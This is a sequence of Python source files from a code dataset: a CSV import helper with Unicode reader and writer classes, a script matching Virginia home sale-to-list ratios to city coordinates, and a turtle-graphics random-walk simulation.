Try to guess file format and ignore header as well.\n Values are stripped of white spaces.\n \"\"\"\n decoder = codecs.getdecoder(charset)\n\n with open(path, \"rb\") as stream:\n dialect=csv.Sniffer().sniff(stream.read())\n stream.seek(0)\n\n result = []\n for cols in csv.reader(stream, dialect=dialect):\n if len(cols) < 5:\n continue\n if isinstance(cols[0], basestring):\n if len(cols[0]) == 0 or cols[0].startswith(\"#\"):\n continue\n\n result.append(map(lambda col: decoder(col, errors='replace')[0].strip(), cols))\n\n empty_cols = {}\n for row in result:\n for cn in range(0, len(row)):\n if len(row[cn]) == 0:\n empty_cols[cn] = empty_cols.get(cn, 0) + 1\n \n for cn, nr in empty_cols.items():\n if nr == len(result):\n # It's empty for all rows\n for row in result:\n row.pop(cn)\n return result\n\nclass UTF8Recoder(object):\n \"\"\"\n Iterator that reads an encoded stream and reencodes the input to UTF-8\n \"\"\"\n def __init__(self, f, encoding):\n self.reader = codecs.getreader(encoding)(f)\n\n def __iter__(self):\n return self\n\n def next(self):\n return self.reader.next().encode(\"utf-8\")\n\nclass UnicodeReader(object):\n \"\"\"\n A CSV reader which will iterate over lines in the CSV file \"f\",\n which is encoded in the given encoding.\n \"\"\"\n\n def __init__(self, f, dialect=csv.excel, encoding=\"utf-8\", **kwds):\n f = UTF8Recoder(f, encoding)\n self.reader = csv.reader(f, dialect=dialect, **kwds)\n\n def next(self):\n row = self.reader.next()\n return [unicode(s, \"utf-8\") for s in row]\n\n def __iter__(self):\n return self\n\nclass UnicodeWriter(object):\n \"\"\"\n A CSV writer which will write rows to CSV file \"f\",\n which is encoded in the given encoding.\n \"\"\"\n\n def __init__(self, f, dialect=csv.excel, encoding=\"utf-8\", **kwds):\n # Redirect output to a queue\n self.queue = cStringIO.StringIO()\n self.writer = csv.writer(self.queue, dialect=dialect, **kwds)\n self.stream = f\n self.encoder = codecs.getencoder(encoding)\n self.encoding = encoding\n\n def writerow(self, row):\n self.writer.writerow([s.encode(\"utf-8\") for s in row])\n # Fetch UTF-8 output from the queue ...\n data = self.queue.getvalue()\n if self.encoding != 'utf-8':\n data = data.decode(\"utf-8\")\n # ... 
and reencode it into the target encoding\n data = self.encoder(data, errors='replace')[0]\n # write to the target stream\n self.stream.write(data)\n # empty queue\n self.queue.truncate(0)\n\n def writerows(self, rows):\n for row in rows:\n self.writerow(row)\n","sub_path":"fiveCents/branches/balance_add_menu/fivecents/lib/import_helpers.py","file_name":"import_helpers.py","file_ext":"py","file_size_in_byte":3671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"143653733","text":"# -*- coding: utf-8 -*-\nimport csv\nimport matplotlib.pyplot as plt; plt.rcdefaults()\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#adds to saleToListVA dictionary\ncityList = []\nratioList = []\nratioCity = {}\nwith open('C:\\\\Users\\\\espos\\\\Documents\\\\GitHub\\\\mlh-hackathon-flask-starter\\\\app\\\\datasets\\\\SaleToListRatio_City.csv') as csv_file:\n vaEstate = csv.DictReader(csv_file)\n for va in vaEstate:\n if (va['StateName'] == \"VA\"):\n ratioList.append(va['2019-11'])\n cityList.append(va['RegionName'])\n ratioCity[va['RegionName']] = va['2019-11']\nx = 0\nlatVA = []\nlongVA = []\ncity_file = open(\"cityVA.csv\", \"w\")\ncityWriter = csv.writer(city_file)\ncityWriter.writerow(['CityName', 'Latitude', 'Longitude', 'S/L Ratio'])\nwith open('C:\\\\Users\\\\espos\\\\Documents\\\\GitHub\\\\mlh-hackathon-flask-starter\\\\app\\\\datasets\\\\us-zip-code-latitude-and-longitude\\\\va-zip-code-latitude-and-longitude.csv') as csv_file2:\n csvValues = []\n vaCity = csv.DictReader(csv_file2)\n for urban in vaCity:\n csvValues = urban['Zip;City;State;Latitude;Longitude;Timezone;Daylight savings time flag;geopoint'].split(';')\n for i in cityList:\n if (i == csvValues[1]):\n #print(i)\n print(csvValues[1] + \" \" + csvValues[3] + \" \" + csvValues[4])\n# print(float(csvValues[3]))\n# print(float(csvValues[4]))\n latVA.append(float(csvValues[3]))\n longVA.append(float(csvValues[4]))\n cityWriter.writerow([csvValues[1], csvValues[3], csvValues[4], ratioCity[csvValues[1]]])\ncity_file.close()\n","sub_path":"app/vaParse.py","file_name":"vaParse.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"334133388","text":"\"\"\"\nPurpose : Simulate Random Walks\nAuthor : Vivek T S\nDate : 12/11/2018\n\"\"\"\nimport turtle\nimport random\nimport math\n\ndef randomWalk(steps, tortoise):\n\t\"\"\"\n\tDescription :\n\t\tEmulate random walks\n\tParameters :\n\t\tsteps - no. of steps needed to take\n\t\ttortoise - turtle class handler\n\tReturn value:\n\t\tdistance from origin\n\t\"\"\"\n\tx=0\n\ty=0\n\tmoveLength=10\n\tfor step in range(steps):\n\t\tr = random.random()\n\t\tif r < 0.25:\n\t\t\tx=x+1\n\t\telif r < 0.5:\n\t\t\ty=y+1\n\t\telif r < 0.75:\n\t\t\tx=x-1\n\t\telse:\n\t\t\ty=y-1\n\t\ttortoise.goto(x*moveLength,y*moveLength)\n\treturn math.sqrt(x*x+y*y)\n\ndef main():\n\ttortoise = turtle.Turtle()\n\tsteps = int(input('Steps : '))\n\trandomWalk(steps, tortoise)\n\nmain()\n","sub_path":"4. Discovering Computer Science/Python/Chapter 5 - Forks in the road/randomwalks.py","file_name":"randomwalks.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
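The randomwalks.py record above returns each walk's final distance from the origin, but it animates a single walk with turtle graphics. For a simple 2D lattice walk the expected squared displacement after n unit steps is exactly n, so the root-mean-square distance should grow like sqrt(n). Below is a minimal headless sketch of that check, assuming the same four-direction step rule as randomwalks.py; the helper names are made up for illustration and are not part of any record above.

import math
import random

def final_displacement(steps):
    """Walk `steps` unit steps on the 2D lattice; return squared distance from the origin."""
    x = y = 0
    for _ in range(steps):
        r = random.random()
        if r < 0.25:
            x += 1
        elif r < 0.5:
            y += 1
        elif r < 0.75:
            x -= 1
        else:
            y -= 1
    return x * x + y * y

def rms_distance(steps, trials=2000):
    """Monte Carlo estimate of the root-mean-square final distance."""
    total = sum(final_displacement(steps) for _ in range(trials))
    return math.sqrt(total / trials)

if __name__ == '__main__':
    # E[x^2 + y^2] = n for a simple 2D lattice walk, so the RMS distance
    # should track sqrt(n): roughly 10, 20, 40 for the lengths below.
    for n in (100, 400, 1600):
        print(n, round(rms_distance(n), 1))

Dropping the turtle handler keeps each trial cheap, which is what makes running thousands of walks per length practical.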